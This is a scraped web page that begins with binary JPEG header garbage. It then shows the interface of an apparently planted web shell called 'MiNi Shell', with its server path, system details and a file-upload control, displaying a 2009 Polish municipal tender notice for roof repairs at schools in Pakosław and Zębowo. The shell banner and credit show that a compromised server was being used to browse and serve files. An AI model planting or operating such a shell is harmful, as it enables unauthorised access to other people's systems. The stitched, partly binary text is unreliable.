JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090209/22030-N-2009.html

<p class="kh_header"><b>Lwówek: Wykonanie remontowych robót budowlanych w podziale na zadania; 
Zadanie I :  Remont dachu na budynku szkoły podstawowej w Pakosławiu.
Zadanie II : Remont dachu na budynku szkoły podstawowej w Zębowie.</b><br>
<b>Numer ogłoszenia: 22030 - 2009; data zamieszczenia: 09.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lwówek , ul. Ratuszowa 2, 64-310 Lwówek, woj. wielkopolskie, tel. 061 4414024, faks 061 4414212.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.lwowek.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontowych robót budowlanych w podziale na zadania; 
Zadanie I :  Remont dachu na budynku szkoły podstawowej w Pakosławiu.
Zadanie II : Remont dachu na budynku szkoły podstawowej w Zębowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Roboty wykonywane na zgłoszenie zamiaru wykonywania robót budowlanych, w oparciu o ar. 29 i art. 30 ust. 1 ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2006r. Nr 156 poz 1118 ze zm.).

Opis przedmiotu zamówienia :
Zadanie I : 
przedmiotem zamówienia jest wykonanie remontu dachu na budynku szkoły podstawowej w Pakosławiu polegającego na wymianie pokrycia dachu z dachówki karpiówki na blachodachówkę  w kolorze naturalnej czerwieni (RAL 3000), wraz z dostawą wszystkich niezbędnych materiałów do wykonania zadania.
Szkoła podstawowa w Pakosławiu jest obiektem czynnym do dnia 19.06.2009r., po tym okresie następują ferie letnie dla uczniów.
Zamawiający dopuszcza wykonanie robót w czynnym obiekcie szkoły pod warunkiem wcześniejszego uzgodnienia z dyrekcją szkoły terminu i warunków rozpoczęcia robót  w czynnym obiekcie, wraz z pełnym zachowaniem zasad bhp i p.poż.
Zakres remontu dachu w zadaniu I określa przedmiar robót z dn. 2008-09-16 (str.1+2) załącznik do siwz, w skład którego wchodzą między innymi niżej wymienione roboty;

1. Roboty zabezpieczające, tymczasowe i porządkowe:
1) odgrodzenie terenu budowy przed dostępem osób niepowołanych, 
2) montaż elementów zabezpieczających i rusztowań,  
3) zabezpieczenie elementów budynku przed uszkodzeniem podczas robót, 
4) roboty dotyczące wykonania prac porządkowych po robotach remontowych, 
5) wywóz i utylizacja gruzu z rozbiórek na legalne wysypisko (dowód oddania materiałów z rozbiórki w razie potrzeby do wglądu). 

2. Roboty rozbiórkowe:
1) demontaż przewodów uziemniajacych i odgromowych,
2) rozebranie obróbek blacharskich rynien dachowych i rur spustowych nie nadających się do użytku,     
3) rozbiórka pokrycia dachu z dachówki karpiówki układanej podwójnie,
4) rozebranie ołacenia dachu (odstęp łat do 24cm),
5) rozebranie kominów do podstawy dachu.                                 

Po wykonaniu rozbiórki starego pokrycia i demontaży, powierzchnia dachu winna  być zabezpieczana
na czas robót folią budowlaną (przed wpływem czynników atmosferycznych - deszczy).

3. Roboty remontowe:
1) wymiana drewnianych elementów konstrukcyjnych dachu jeżeli zaistnieje taka konieczność,  
2) odgrzybianie elementów drewnianych metodą dwukrotnego smarowania i zabezpieczenie 
    elementów drewnianych przeciwpożarowo,                     
3) ułożenie ekranu zabezpieczającego z membrany dachowej,  	
4) ołacenie połaci dachowych łatami 38x50mm w rozstawie do 24cm (zabezpieczone jak w pakt. 2), 
5) pokrycie dachu blachodachówką w kolorze naturalnej czerwieni, 
6) montaż obróbek blacharskich z blachy powlekanej w kolorze blachodachówki,		
7) wymurowanie nowych kominów od podstawy dachu z pełnej cegły klinkier pod licówkę z 
    wykonaniem czap kominowych (w takich samych wymiarach jak istniejące),		
8) montaż instalacji odgromowej i zwodów poziomych,       	
9) montaż rynien i rur spustowych z PCV,	
10) montaż okienek wyłazowych dla kominiarza, montaż ławy kominiarskiej przy kominach - 
    rozwiązanie systemowe pokrycia dachu.

4. Roboty inne:
1) wykonanie badań w zakresie skuteczności instalacji odgromowej z uzyskaniem pozytywnego 
    protokółu z badań,
2) wykonanie badań w zakresie skuteczności przewodów kominowych z uzyskaniem pozytywnego 
    protokółu z badań,

Uwagi:
1. Z uwagi na opis przedmiotu zamówienia w przedmiarze robót przewidujący wykonanie poszczególnych robót przed dokonaną rozbiórką Wykonawcy przystępujący do postępowania zobligowani są do przeprowadzenia wizji lokalnej na miejscu wykonywania robót tj. w szkole podstawowej w Pakosławiu i uzyskania wszelkich niezbędnych informacji do sporządzenia oferty, oraz przewidzenia wszystkich innych niezauważonych i nieujętych robót w zakresie przedmiotu zamówienia i przedstawionym przedmiarze robót, a niezbędnych do prawidłowego i kompletnego wykonania zadania.
2. Do zadania została sporządzona Specyfikacja Techniczna Wykonania i Odbioru Robót (ST) - Remont dachu na budynku szkoły podstawowej w Pakosławiu i Zębowie, dołączona do siwz (zał. nr 11).
3. Wykonywanie robót remontowych dachu jest przeprowadzane na zgłoszenie zamiaru wykonywania robót budowlanych nie wymagających pozwolenia na budowę.
Zamawiający nie posiada dokumentacji projektowej do tego zadania, wszystkie uzgodnienia dotyczące szczegółów wykonania przedmiotu zamówienia będą uzgadniane na bieżąco z ustanowionym inspektorem nadzoru inwestorskiego posiadającym uprawnienia budowlane w zakresie konstrukcji budowlanych.    
4. Połać dachu może być ocieplona na niektórych powierzchniach.
5. Zamawiający do tego zadania posiada inwentaryzację rysunkową, którą załącza do siwz (zał. nr 9) 

Zadanie II : 
przedmiotem zamówienia jest wykonanie remontu dachu na budynku szkoły podstawowej w Zębowie (stara część + łącznik), polegający na wymianie pokrycia dachu z dachówki karpiówki na blacho dachówkę  w kolorze naturalnej czerwieni (RAL 3000), wraz z dostawą wszystkich niezbędnych materiałów do wykonania zadania.

Szkoła podstawowa w Zębowie jest obiektem czynnym do dnia 19.06.2009r., po tym okresie następują ferie letnie dla uczniów.
Zamawiający dopuszcza wykonanie robót w czynnym obiekcie szkoły pod warunkiem wcześniejszego uzgodnienia z dyrekcją szkoły terminu i warunków rozpoczęcia robót w czynnym obiekcie, wraz z pełnym zachowaniem zasad bhp i p.poż.
Zakres remontu dachu w zadaniu II: określa przedmiar robót  664-00-000 - załącznik do siwz, w skład którego wchodzą między innymi niżej wymienione roboty.

1. Roboty zabezpieczające, tymczasowe i porządkowe:
1) odgrodzenie terenu budowy przed dostępem osób niepowołanych, 
2) montaż elementów zabezpieczających i rusztowań,  
3) zabezpieczenie elementów budynku przed uszkodzeniem podczas robót, 
4) roboty dotyczące wykonania prac porządkowych po robotach remontowych, 
5) wywóz i utylizacja gruzu z rozbiórek na legalne wysypisko (dowód oddania materiałów z rozbiórki w razie potrzeby do wglądu). 

2. Roboty rozbiórkowe:
1) demontaż przewodów uziemniajacych i odgromowych,
2) rozebranie obróbek blacharskich rynien dachowych i rur spustowych nie nadających się do użytku,     
3) rozbiórka pokrycia dachu z dachówki karpiówki układanej podwójnie,
4) rozebranie ołacenia dachu (odstęp łat do 24cm),
5) rozebranie kominów do podstawy dachu.                                 
                                 
Po wykonaniu rozbiórki starego pokrycia i demontaży, powierzchnia dachu winna  być zabezpieczana
na czas robót folią budowlaną (przed wpływem czynników atmosferycznych - deszczy).

3. Roboty remontowe:
1) wymiana drewnianych elementów konstrukcyjnych dachu jeżeli zaistnieje taka konieczność,  
2) odgrzybianie elementów drewnianych metodą dwukrotnego smarowania i zabezpieczenie 
    elementów drewnianych przeciwpożarowo,                     
3) ułożenie ekranu zabezpieczającego z folii (stary budynek szkoły), membrana dachowa na łączniku,  
4) ołacenie połaci dachowych łatami 38x50mm w rozstawie do 24cm (zabezpieczone jak w pakt.2), 
5) pokrycie dachu blachodachówką w kolorze naturalnej czerwieni, 
6) montaż obróbek blacharskich z blachy powlekanej w kolorze blachodachówki,		
7) wymurowanie nowych kominów od podstawy dachu z pełnej cegły klinkier pod licówkę z 
    wykonaniem czap kominowych (w takich samych wymiarach jak istniejące),		
8) montaż instalacji odgromowej i zwodów poziomych,       	
9) montaż rynien i rur spustowych z PCV,	
10) montaż okienek wyłazowych dla kominiarza, montaż ławy kominiarskiej przy kominach - 
    rozwiązanie systemowe pokrycia dachu.
11) ewentualna wymiana podbitki okapów deskami boazeryjnymi w kolorze ciemnego brązu, 
    zabezpieczonymi jak wyżej w ppkt. 2).

4. Roboty inne:
1) wykonanie badań w zakresie skuteczności instalacji odgromowej z uzyskaniem pozytywnego 
    protokółu z badań,
2) wykonanie badań w zakresie skuteczności przewodów kominowych z uzyskaniem pozytywnego 
    protokółu z badań,

Uwagi:
1. Z uwagi na opis przedmiotu zamówienia w przedmiarze robót przewidujący wykonanie poszczególnych robót przed dokonaną rozbiórką Wykonawcy przystępujący do postępowania zobligowani są do przeprowadzenia wizji lokalnej na miejscu wykonywania robót tj. w szkole podstawowej w Zębowie i uzyskania wszelkich niezbędnych informacji do sporządzenia oferty, oraz przewidzenia wszystkich innych niezauważonych i nieujętych robót w zakresie przedmiotu zamówienia i przedstawionym przedmiarze robót, a niezbędnych do prawidłowego i kompletnego wykonania zadania.
2. Do zadania została sporządzona Specyfikacja Techniczna Wykonania i Odbioru Robót (ST) - Remont dachu na budynku szkoły podstawowej w Pakosławiu i Zębowie, dołączona do siwz (zał. nr 11).
3. Wykonywanie robót remontowych dachu jest przeprowadzane na zgłoszenie zamiaru wykonywania robót budowlanych nie wymagających pozwolenia na budowę.
Zamawiający nie posiada dokumentacji projektowej do tego zadania, wszystkie uzgodnienia dotyczące szczegółów wykonania przedmiotu zamówienia będą uzgadniane na bieżąco z ustanowionym inspektorem nadzoru inwestorskiego posiadającym uprawnienia budowlane w zakresie konstrukcji budowlanych.    
4. Płaszczyzna dachu na budynku łącznika od powierzchni strychu jest ocieplona..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.45.30.00-7, 45.26.12.10-9, 45.26.12.13-0, 45.26.25.20-6, 45.31.51.00-9, 45.26.13.20-3, 45.42.11.00-5, 45.11.12.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków : 
1. Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek poosiadania takich uprawnień;  
2. Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;  
3. Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;  
4. Niepodlegający wykluczeniu z postępowania o udzielenie zamówienia.    

1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek poosiadania takich uprawnień.
Warunek spełnią wykonawcy, którzy :
1) prowadzą działalność gospodarczą w rozumieniu ustawy z dnia 2 lipca 2004 roku o swobodzie działalności gospodarczej (Dz. U.04.173.1807), odpowiadającą swoim charakterem przedmiotowemu zamówieniu,
2) i posiadają dokumenty potwierdzające posiadanie uprawnień - pełnomocnictw dla osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.

2. Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i 
osobami zdolnymi do wykonania zamówienia. Warunek spełnią wykonawcy, którzy : 
1) dysponują minimum jedną osobą (kierownikiem robót) posiadającą uprawnienia budowlane w specjalności konstrukcyjno budowlanej (o których mowa w art. 14 ust. 1 pkt 4 ustawy z dnia 7 lipca 1994 roku - Prawo budowlane Dz. U. z 2006 roku, Nr 156, poz. 1118, z późn. zm.), która dysponuje aktualnym dokumentem potwierdzającym przynależność do Okręgowej Izby Inżynierów Budownictwa, 
2) wykażą  w okresie ostatnich pięciu lat przed wszczęciem postępowania (a jeżeli okres działalności jest krótszy - w tym okresie) należytego wykonania  minimum trzech robót budowlanych odpowiadających swoim rodzajem zakresem i wartością robotom stanowiącym przedmiot zamówienia i posiadają dokumenty potwierdzające, że roboty te wykonali z należytą starannością, 
3) wykażą się niezbędnymi do wykonania zamówienia narzędziami i urządzeniami i przedstawią formę władania nimi,
4) wykażą że dysponują osobami zdolnymi do wykonania przedmiotowego zamówienia,
5) Z uwagi na wykonywanie robót na zgłoszenie zamiaru wykonywania robót budowlanych nie wymagających pozwolenia na budowę oraz na podstawie decyzji PINB, Zamawiający nie posiada dokumentacji projektowej do tego zadania i oświadcza, że  Wykonawcy przystępujący do postępowania są zobowiązani do :
a) obligatoryjnego dokonania wizji lokalnej na terenie budowy, zapoznania się ze Specyfikacją Istotnych Warunków Zamówienia, opisem przedmiotu zamówienia, specyfikacjami technicznymi wykonania i odbioru robót, przedmiarami robót, uznaje je za wystarczające i nie wnoszą do nich zastrzeżeń.
b) uzyskali wszelkie i niezbędne informacje, które były konieczne do przygotowania oferty i wykonania przedmiotu zamówienia, co do ilości i rodzaju robót oraz warunków realizacji jak również wszelkich utrudnień związanych z prowadzeniem prac będących przedmiotem zamówienia.
c) sprawdzili zgodność przedmiaru robót ze stanem faktycznym i ujęli wszystkie niezbędne elementy i składniki mające wpływ na cenę przedmiotu umowy w zakresie zadania  I i zadania II, co potwierdzą w stosownym oświadczeniu.

3. Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Warunek spełnią wykonawcy, którzy :
1) posiadają i przedstawią aktualną polisę ubezpieczeniową potwierdzającą że są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 200.000,00zł od jednego zdarzenia.
2) udzielą zamawiającemu zgody na wydłużony okres płatności dla poszczególnych zadań w fakturach częściowych za zadanie do 30 dni po pozytywnym dokonaniu odbioru końcowego robót.

4. Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia. Warunek spełnią wykonawcy, którzy :
1) załączą oświadczenie o spełnieniu warunków udziału w postępowaniu i załączą dokumenty, potwierdzające spełnienie warunków udziału w postępowaniu. 

Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego spełnia/niespełna i będzie polegała na formalnym sprawdzeniu czy w przedstawionych przez wykonawcę dokumentach znajdują się informacje i oświadczenia potwierdzające spełnienie tych warunków..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na ofertę składają się następujące dokumenty i załączniki: 
1) Formularz ofertowy Wykonawcy - wypełniony i podpisany przez wykonawcę - załącznik nr 1, w załączeniu kosztorys ofertowy, 
uwaga; ponieważ obowiązuje wynagrodzenie  ryczałtowe, kosztorys ofertowy nie będzie miał zastosowania na etapie oceny ofert. 
2) Oświadczenie o spełnieniu warunków udziału w postępowaniu, określone w art. 22 ustawy - Prawo zamówień publicznych - załącznik nr 2,
3) Projekt umowy  - parafowany przez wykonawcę - załącznik nr 3,
4) Wykazanie w ciągu ostatnich pięciu lat, minimum trzech zamówień odpowiadających swoim rodzajem, zakresem i wartością robotom budowlanym stanowiącym przedmiot zamówienia (wykaz robót  budowlanych sporządzony przez Wykonawcę z podaniem wartości zamówień, dat wykonania, nazwy i adresu oraz tel. zamawiającego dla, którego Wykonawca wykonał zamówienie, z dołączonym potwierdzeniem należytego wykonania zamówienia - referencje) - załącznik nr 4.
5) wykaz niezbędnego sprzętu narzędzi i urządzeń przewidzianych do wykonania zamówienia - załącznik nr 5,
6) Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności- załącznik nr 6,
7) Aktualny dokument rejestracji, potwierdzający prowadzenie działalności gospodarczej w zakresie objętym zamówieniem,
8) Dokumenty potwierdzające posiadanie uprawnień - pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych, w przypadku udzielenia pełnomocnictwa do podpisania oferty wraz z załącznikami osobie innej niż upoważniona do reprezentacji - dokument pełnomocnictwa, 
9) Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - kopie uprawnień budowlanych w specjalności konstrukcyjno budowlanej i aktualny dokument potwierdzający przynależność do Okręgowej Izby Inżynierów Budownictwa dla osób/y odpowiedzialnej za realizację robót (kierownik budowy), 
10) Oświadczenie o zapoznaniem się z terenem w którym będzie wykonywane zadanie i uzyskaniu wszystkich niezbędnych informacji mogących mieć wpływ na sporządzenie oferty oraz jej cenę, 
11)  Aktualna polisa ubezpieczeniowa potwierdzającą że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 200.000,00zł od jednego zdarzenia.
12) Zgoda na okres płatności faktur częściowych dla zadań do 30 dni po pozytywnym dokonaniu odbioru końcowego robót.
13) Projekt umowy (parafowana każda strona) podpisany bez zastrzeżeń lub z wyszczególnionymi zastrzeżeniami..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.lwowek.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Bezpłatnie w Urzędzie Miasta i Gminy w Lwówku, ul. Ratuszowa 2, pokój nr 10 w godzinach urzędowania..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2009 godzina 09:00, miejsce: Urząd Miasta i Gminy w Lwówku, ul. Ratuszowa 2, 64-310 Lwówek, pokój nr 5 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com